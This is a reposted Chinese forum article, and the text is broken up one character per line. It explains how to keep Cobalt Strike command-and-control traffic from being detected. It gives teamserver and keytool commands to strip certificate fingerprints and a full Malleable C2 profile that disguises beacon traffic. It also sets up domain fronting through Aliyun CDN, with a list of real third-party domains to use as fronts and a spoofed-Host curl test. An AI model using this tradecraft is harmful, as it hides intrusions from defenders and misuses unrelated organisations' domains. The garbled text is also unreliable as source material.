论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[21812] 2021-03-27_CobaltStrike绕过流量审计
文档创建者:
s7ckTeam
浏览次数:
5
最后更新:
2025-01-18
IOT
5 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-03-27_CobaltStrike绕过流量审计
C
o
b
a
l
t
S
t
r
i
k
e
绕
过
流
量
审
计
转
自
H
A
C
K
之
道
L
e
m
o
n
S
e
c
2
0
2
1
-
0
3
-
2
7
C
o
b
a
l
t
S
t
r
i
k
e
简
介
简
介
C
o
b
a
l
t
S
t
r
i
k
e
i
s
s
o
f
t
w
a
r
e
f
o
r
A
d
v
e
r
s
a
r
y
S
i
m
u
l
a
t
i
o
n
s
a
n
d
R
e
d
T
e
a
m
O
p
e
r
a
t
i
o
n
s
.
C
o
b
a
l
t
S
t
r
i
k
e
简
称
C
S
,
A
-
t
e
a
m
详
细
介
绍
使
用
网
址
。
C
S
是
一
款
优
秀
的
后
渗
透
工
具
,
可
以
在
获
取
主
机
权
限
后
进
行
长
久
权
限
维
持
,
快
速
进
行
内
网
提
权
,
凭
据
导
出
等
。
在
后
渗
透
中
如
果
未
修
改
特
征
,
容
易
被
流
量
审
计
设
备
监
控
,
被
蓝
队
溯
源
。
多
人
运
动
来
不
来
多
人
运
动
来
不
来
?
去
除
特
征
的
三
种
方
式
去
除
特
征
的
三
种
方
式
1
.
修
改
默
认
端
口
修
改
默
认
端
口
第
一
种
是
直
接
编
辑
t
e
a
m
s
e
r
v
e
r
进
行
启
动
项
修
改
。
-
.
/
t
e
a
m
s
e
r
v
e
r
1
.
1
.
1
.
1
p
a
s
s
w
o
r
d
直
接
修
改
t
e
a
m
s
e
r
v
e
r
v
i
m
t
e
a
m
s
e
r
v
e
r
第
二
种
是
启
动
的
时
候
指
定
s
e
r
v
e
r
_
p
o
r
t
端
口
2
.
去
除
证
书
特
征
去
除
证
书
特
征
进
入
c
s
目
录
。
查
看
k
e
y
t
o
o
l
-
l
i
s
t
-
v
-
k
e
y
s
t
o
r
e
c
o
b
a
l
t
s
t
r
i
k
e
.
s
t
o
r
e
证
书
情
况
,
输
入
默
认
密
码
1
2
3
4
5
6
回
车
,
可
以
看
到
所
有
者
、
发
布
者
中
C
o
b
a
l
t
S
t
r
i
k
e
相
关
字
样
。
-
j
a
v
a
-
X
X
:
P
a
r
a
l
l
e
l
G
C
T
h
r
e
a
d
s
=
4
-
D
u
s
e
r
.
l
a
n
g
u
a
g
e
=
e
n
-
D
c
o
b
a
l
t
s
t
r
i
k
e
.
s
e
r
v
e
r
_
p
o
r
t
=
5
0
5
0
5
-
D
j
a
v
a
x
.
n
e
t
.
s
s
l
.
k
e
y
S
t
o
r
e
=
.
/
c
o
b
a
l
t
s
t
r
i
k
e
.
s
t
o
r
e
-
D
j
a
v
a
x
.
n
e
t
.
s
s
l
.
k
e
y
S
t
o
r
e
P
a
s
s
w
o
r
d
=
1
2
3
4
5
6
-
s
e
r
v
e
r
-
X
X
:
+
A
g
g
r
e
s
s
i
v
e
H
e
a
p
-
X
X
:
+
U
s
e
P
a
r
a
l
l
e
l
G
C
-
X
m
x
1
0
2
4
m
-
c
l
a
s
s
p
a
t
h
.
/
c
o
b
a
l
t
s
t
r
i
k
e
.
j
a
r
s
e
r
v
e
r
.
T
e
a
m
S
e
r
v
e
r
x
x
x
.
x
x
x
.
x
x
.
x
x
t
e
s
t
g
o
o
g
l
e
.
p
r
o
f
i
l
e
k
e
y
t
o
o
l
是
一
个
J
a
v
a
数
据
证
书
的
管
理
工
具
,
使
用
如
下
:
k
e
y
t
o
o
l
-
k
e
y
s
t
o
r
e
c
o
b
a
l
t
s
t
r
i
k
e
.
s
t
o
r
e
-
s
t
o
r
e
p
a
s
s
密
码
-
k
e
y
p
a
s
s
密
码
-
g
e
n
k
e
y
-
k
e
y
a
l
g
R
S
A
-
a
l
i
a
s
g
o
o
g
l
e
.
c
o
m
-
d
n
a
m
e
"
C
N
=
(
名
字
与
姓
氏
)
,
O
U
=
(
组
织
单
位
名
称
)
,
O
=
(
组
织
名
称
)
,
L
=
(
城
市
或
区
域
名
称
)
,
S
T
=
(
州
或
省
份
名
称
)
,
C
=
(
单
位
的
两
字
母
国
家
代
码
)
。
e
x
a
m
p
l
e
:
未
修
改
c
o
b
a
l
t
s
t
r
i
k
e
.
s
t
o
r
e
前
:
k
e
y
t
o
o
l
-
k
e
y
s
t
o
r
e
c
o
b
a
l
t
s
t
r
i
k
e
.
s
t
o
r
e
-
s
t
o
r
e
p
a
s
s
1
2
3
4
5
6
-
k
e
y
p
a
s
s
1
2
3
4
5
6
-
g
e
n
k
e
y
-
k
e
y
a
l
g
R
S
A
-
a
l
i
a
s
g
o
o
g
l
e
.
c
o
m
-
d
n
a
m
e
"
C
N
=
U
S
,
O
U
=
g
o
o
g
l
e
.
c
o
m
,
O
=
S
o
f
a
w
a
r
e
,
L
=
S
o
m
e
w
h
e
r
e
,
S
T
=
C
y
b
e
r
s
p
a
c
e
,
C
=
C
N
"
修
改
c
o
b
a
l
t
s
t
r
i
k
e
.
s
t
o
r
e
后
,
可
以
看
到
c
o
b
a
l
t
s
t
r
i
k
e
等
关
键
字
样
已
经
去
除
:
g
o
o
g
l
e
.
p
r
o
f
i
l
e
模
版
可
以
参
考
C
2
.
p
r
o
f
i
l
e
(
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
r
s
m
u
d
g
e
/
M
a
l
l
e
a
b
l
e
-
C
2
-
P
r
o
f
i
l
e
s
/
t
r
e
e
/
m
a
s
t
e
r
/
A
P
T
)
和
m
a
l
l
e
a
b
l
e
-
c
2
(
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
t
h
r
e
a
t
e
x
p
r
e
s
s
/
m
a
l
l
e
a
b
l
e
-
c
2
/
b
l
o
b
/
m
a
s
t
e
r
/
j
q
u
e
r
y
-
c
2
.
4
.
0
.
p
r
o
f
i
l
e
)
设
置
后
,
可
以
看
到
访
问
/
i
m
a
g
e
/
后
已
经
返
回
的
是
我
们
设
置
好
的
h
e
a
d
e
r
了
"
C
o
n
t
e
n
t
-
T
y
p
e
"
"
i
m
g
/
j
p
g
"
;
"
S
e
r
v
e
r
"
"
n
g
i
n
x
/
1
.
1
0
.
3
(
U
b
u
n
t
u
)
"
;
部
分
引
用
源
码
如
下
:
#
#
c
s
p
r
o
f
i
l
e
#
h
t
t
p
:
/
/
w
w
w
.
s
e
c
u
r
e
w
o
r
k
s
.
c
o
m
/
c
y
b
e
r
-
t
h
r
e
a
t
-
i
n
t
e
l
l
i
g
e
n
c
e
/
t
h
r
e
a
t
s
/
s
e
c
r
e
t
s
-
o
f
-
t
h
e
-
c
o
m
f
o
o
-
m
a
s
t
e
r
s
/
#
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
r
s
m
u
d
g
e
/
M
a
l
l
e
a
b
l
e
-
C
2
-
P
r
o
f
i
l
e
s
/
#
A
u
t
h
o
r
:
@
k
e
y
i
#
s
e
t
s
a
m
p
l
e
_
n
a
m
e
"
g
o
o
g
l
e
"
;
s
e
t
s
l
e
e
p
t
i
m
e
"
5
0
0
0
"
;
s
e
t
j
i
t
t
e
r
"
0
"
;
s
e
t
m
a
x
d
n
s
"
2
5
5
"
;
s
e
t
u
s
e
r
a
g
e
n
t
"
M
o
z
i
l
l
a
/
5
.
0
(
c
o
m
p
a
t
i
b
l
e
;
M
S
I
E
8
.
0
;
W
i
n
d
o
w
s
N
T
6
.
1
;
T
r
i
d
e
n
t
/
5
.
0
)
"
;
h
t
t
p
-
g
e
t
{
s
e
t
u
r
i
"
/
i
m
a
g
e
/
"
;
c
l
i
e
n
t
{
h
e
a
d
e
r
"
A
c
c
e
p
t
"
"
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
;
q
=
0
.
9
,
*
/
*
l
;
q
=
0
.
8
"
;
h
e
a
d
e
r
"
R
e
f
e
r
e
r
"
"
h
t
t
p
:
/
/
w
w
w
.
g
o
o
g
l
e
.
c
o
m
"
;
h
e
a
d
e
r
"
P
r
a
g
m
a
"
"
n
o
-
c
a
c
h
e
"
;
h
e
a
d
e
r
"
C
a
c
h
e
-
C
o
n
t
r
o
l
"
"
n
o
-
c
a
c
h
e
"
;
m
e
t
a
d
a
t
a
{
n
e
t
b
i
o
s
;
a
p
p
e
n
d
"
-
.
j
p
g
"
;
u
r
i
-
a
p
p
e
n
d
;
}
}
s
e
r
v
e
r
{
h
e
a
d
e
r
"
C
o
n
t
e
n
t
-
T
y
p
e
"
"
i
m
g
/
j
p
g
"
;
h
e
a
d
e
r
"
S
e
r
v
e
r
"
"
n
g
i
n
x
/
1
.
1
0
.
3
(
U
b
u
n
t
u
)
"
;
o
u
t
p
u
t
{
b
a
s
e
6
4
;
p
r
i
n
t
;
}
}
}
h
t
t
p
-
p
o
s
t
{
s
e
t
u
r
i
"
/
h
i
s
t
o
r
y
/
"
;
c
l
i
e
n
t
{
h
e
a
d
e
r
"
C
o
n
t
e
n
t
-
T
y
p
e
"
"
a
p
p
l
i
c
a
t
i
o
n
/
o
c
t
e
t
-
s
t
r
e
a
m
"
;
h
e
a
d
e
r
"
R
e
f
e
r
e
r
"
"
h
t
t
p
:
/
/
w
w
w
.
g
o
o
g
l
e
.
c
o
m
"
;
h
e
a
d
e
r
"
P
r
a
g
m
a
"
"
n
o
-
c
a
c
h
e
"
;
h
e
a
d
e
r
"
C
a
c
h
e
-
C
o
n
t
r
o
l
"
"
n
o
-
c
a
c
h
e
"
;
i
d
{
n
e
t
b
i
o
s
u
;
a
p
p
e
n
d
"
.
a
s
p
"
;
u
r
i
-
a
p
p
e
n
d
;
}
o
u
t
p
u
t
{
b
a
s
e
6
4
;
p
r
i
n
t
;
}
3
.
修
改
修
改
C
o
b
a
l
t
S
t
r
i
k
e
d
n
s
_
i
d
l
e
0
.
0
.
0
.
0
是
C
o
b
a
l
t
S
t
r
i
k
e
D
N
S
B
e
a
c
o
n
特
征
可
设
置
M
a
l
l
e
a
b
l
e
C
2
进
行
修
改
输
入
s
e
t
d
n
s
_
i
d
l
e
"
8
.
8
.
8
.
8
"
;
域
前
置
域
前
置
原
理
原
理
域
前
置
(
英
语
:
D
o
m
a
i
n
f
r
o
n
t
i
n
g
)
,
是
一
种
隐
藏
连
接
真
实
端
点
来
规
避
互
联
网
审
查
的
技
术
。
在
应
用
层
上
运
作
时
,
域
前
置
使
用
户
能
通
过
H
T
T
P
连
接
到
白
名
单
域
名
(
如
*
.
g
o
o
g
l
e
.
c
n
)
,
无
直
接
与
C
2
服
务
器
的
通
信
。
介
绍
:
被
攻
击
机
器
-
>
(
走
a
l
i
y
u
n
c
d
n
的
域
名
,
根
据
设
定
的
h
o
s
t
头
:
d
n
s
.
g
o
o
g
l
e
.
c
n
找
到
对
应
的
v
p
s
_
i
p
)
-
>
c
d
n
流
量
转
发
到
v
p
s
_
i
p
(
c
2
真
实
地
址
)
实
战
配
置
实
战
配
置
C
D
N
购
买
云
服
务
器
,
开
通
C
D
N
服
务
。
加
速
域
名
:
随
便
填
个
高
信
誉
的
域
名
实
现
域
名
伪
造
,
例
如
:
o
s
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
,
d
n
s
.
g
o
o
g
l
e
.
c
o
m
之
类
的
。
登
陆
a
l
i
y
u
n
。
}
}
s
e
r
v
e
r
{
h
e
a
d
e
r
"
C
o
n
t
e
n
t
-
T
y
p
e
"
"
i
m
g
/
j
p
g
"
;
h
e
a
d
e
r
"
S
e
r
v
e
r
"
"
M
i
c
r
o
s
o
f
t
-
I
I
S
/
6
.
0
"
;
h
e
a
d
e
r
"
X
-
P
o
w
e
r
e
d
-
B
y
"
"
A
S
P
.
N
E
T
"
;
o
u
t
p
u
t
{
b
a
s
e
6
4
;
p
r
i
n
t
;
}
}
}
w
w
w
.
m
i
c
r
o
p
o
r
t
.
c
o
m
在
I
P
位
置
填
写
c
s
_
t
e
a
m
s
e
r
v
e
r
的
I
P
地
址
。
配
置
c
2
的
S
t
a
g
e
r
的
域
名
为
走
c
d
n
的
地
址
,
如
:
w
w
w
.
m
i
c
r
o
p
o
r
t
.
c
o
m
.
c
n
这
种
是
走
a
l
i
y
u
n
c
d
n
的
。
其
中
是
伪
造
的
域
名
地
址
,
目
的
是
目
标
机
器
访
问
c
d
n
的
时
候
可
以
根
据
g
o
o
g
l
e
.
c
n
特
征
找
到
对
应
的
v
p
s
_
i
p
。
有
没
人
跟
我
有
相
同
的
疑
问
,
这
个
走
a
l
i
y
u
n
的
c
d
n
域
名
如
何
获
取
。
这
边
波
师
傅
给
我
提
供
了
一
些
,
可
能
域
名
作
废
或
者
不
走
c
d
n
了
,
大
家
可
以
根
据
c
u
r
l
做
一
下
测
试
。
a
d
m
i
n
.
b
j
e
x
p
o
.
c
o
m
a
d
m
i
n
.
c
a
i
l
i
a
n
p
r
e
s
s
.
c
o
m
a
d
m
i
n
.
c
h
e
y
i
a
n
.
c
o
m
a
d
m
i
n
.
c
y
d
f
.
c
o
m
a
d
m
i
n
.
e
b
p
2
p
.
c
o
m
a
d
m
i
n
.
k
3
.
c
n
a
d
m
i
n
.
k
s
5
u
.
c
o
m
a
d
m
i
n
.
k
y
j
x
y
.
c
o
m
a
d
m
i
n
.
l
e
z
i
.
c
o
m
a
d
m
i
n
.
w
e
i
b
a
6
6
.
c
o
m
a
d
m
i
n
.
w
u
z
h
e
n
f
e
s
t
i
v
a
l
.
c
o
m
a
d
m
i
n
.
x
i
n
g
f
u
j
i
e
.
c
n
a
d
m
i
n
.
y
x
p
2
p
.
c
o
m
a
n
x
i
n
3
6
0
.
c
o
m
a
p
i
.
3
6
5
8
m
a
l
l
.
c
o
m
w
w
w
.
m
i
c
r
o
p
o
r
t
.
c
o
m
.
c
n
d
n
s
.
g
o
o
g
l
e
.
c
n
a
p
i
.
3
6
5
8
m
a
l
l
.
c
o
m
a
p
i
.
b
j
e
x
p
o
.
c
o
m
a
p
i
.
c
h
e
y
i
a
n
.
c
o
m
a
p
i
.
c
y
d
f
.
c
o
m
a
p
i
.
e
b
p
2
p
.
c
o
m
a
p
i
.
k
s
5
u
.
c
o
m
a
p
i
.
k
y
j
x
y
.
c
o
m
a
p
i
.
l
a
n
j
i
n
g
e
r
.
c
o
m
a
p
i
.
m
y
0
8
9
.
c
o
m
a
p
i
.
t
h
e
c
o
v
e
r
.
c
n
a
p
i
.
u
i
y
i
.
c
n
a
p
i
.
u
t
c
a
r
d
.
c
n
a
p
i
.
w
e
i
b
a
6
6
.
c
o
m
a
p
i
.
w
u
z
h
e
n
f
e
s
t
i
v
a
l
.
c
o
m
a
p
i
.
x
i
n
g
f
u
j
i
e
.
c
n
a
p
i
.
y
x
p
2
p
.
c
o
m
a
p
i
.
z
a
o
z
u
o
.
c
o
m
a
p
p
.
b
j
e
x
p
o
.
c
o
m
a
p
p
.
c
h
a
n
j
e
t
.
c
o
m
a
p
p
.
c
h
e
y
i
a
n
.
c
o
m
a
p
p
.
e
b
p
2
p
.
c
o
m
a
p
p
.
e
e
o
.
c
o
m
.
c
n
a
p
p
.
g
f
e
d
u
.
c
n
a
p
p
.
g
u
o
j
i
m
a
m
i
.
c
o
m
a
p
p
.
h
a
o
2
4
.
c
n
a
p
p
.
h
r
m
a
r
k
e
t
.
n
e
t
a
p
p
.
k
3
.
c
n
a
p
p
.
k
y
j
x
y
.
c
o
m
a
p
p
.
l
a
n
j
i
n
g
e
r
.
c
o
m
a
p
p
.
l
e
z
i
.
c
o
m
a
p
p
.
m
e
i
d
u
i
m
a
l
l
.
c
o
m
a
p
p
.
s
a
n
q
i
n
.
c
o
m
a
p
p
.
s
a
n
q
i
n
.
c
o
m
配
置
成
功
后
,
输
入
可
以
查
看
c
s
的
w
e
b
l
o
g
,
看
见
请
求
/
e
e
n
的
日
志
,
证
明
配
置
成
功
。
c
u
r
l
-
v
"
w
w
w
.
m
i
c
r
o
p
o
r
t
.
c
o
m
/
e
e
n
"
-
H
"
H
o
s
t
:
d
n
s
.
g
o
o
g
l
e
.
c
n
"
c
s
生
成
W
i
n
d
o
w
s
e
x
e
,
运
行
成
功
上
线
.
可
以
看
到
1
4
.
1
7
.
6
7
.
4
6
东
莞
I
P
上
线
。
无
直
接
跟
c
2
连
接
的
域
名
信
息
,
这
样
来
说
蓝
队
在
防
守
的
时
候
看
到
的
是
白
名
单
域
名
,
并
且
也
无
法
溯
源
到
我
们
真
实
的
v
p
s
地
址
。
作
者
:
K
e
y
i
,
转
载
于
:
h
t
t
p
s
:
/
/
p
a
p
e
r
.
s
e
e
b
u
g
.
o
r
g
/
1
3
4
9
/
一
如
既
往
的
学
习
,
一
如
既
往
的
整
理
,
一
如
即
往
的
分
享
。
感
谢
支
持
“
如
侵
权
请
私
聊
公
众
号
删
文
”
扫
描
关
注
扫
描
关
注
L
e
m
o
n
S
e
c
觉
得
不
错
点
个
觉
得
不
错
点
个
“
赞
赞
”
、
、
“
在
看
在
看
”
哦
哦
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT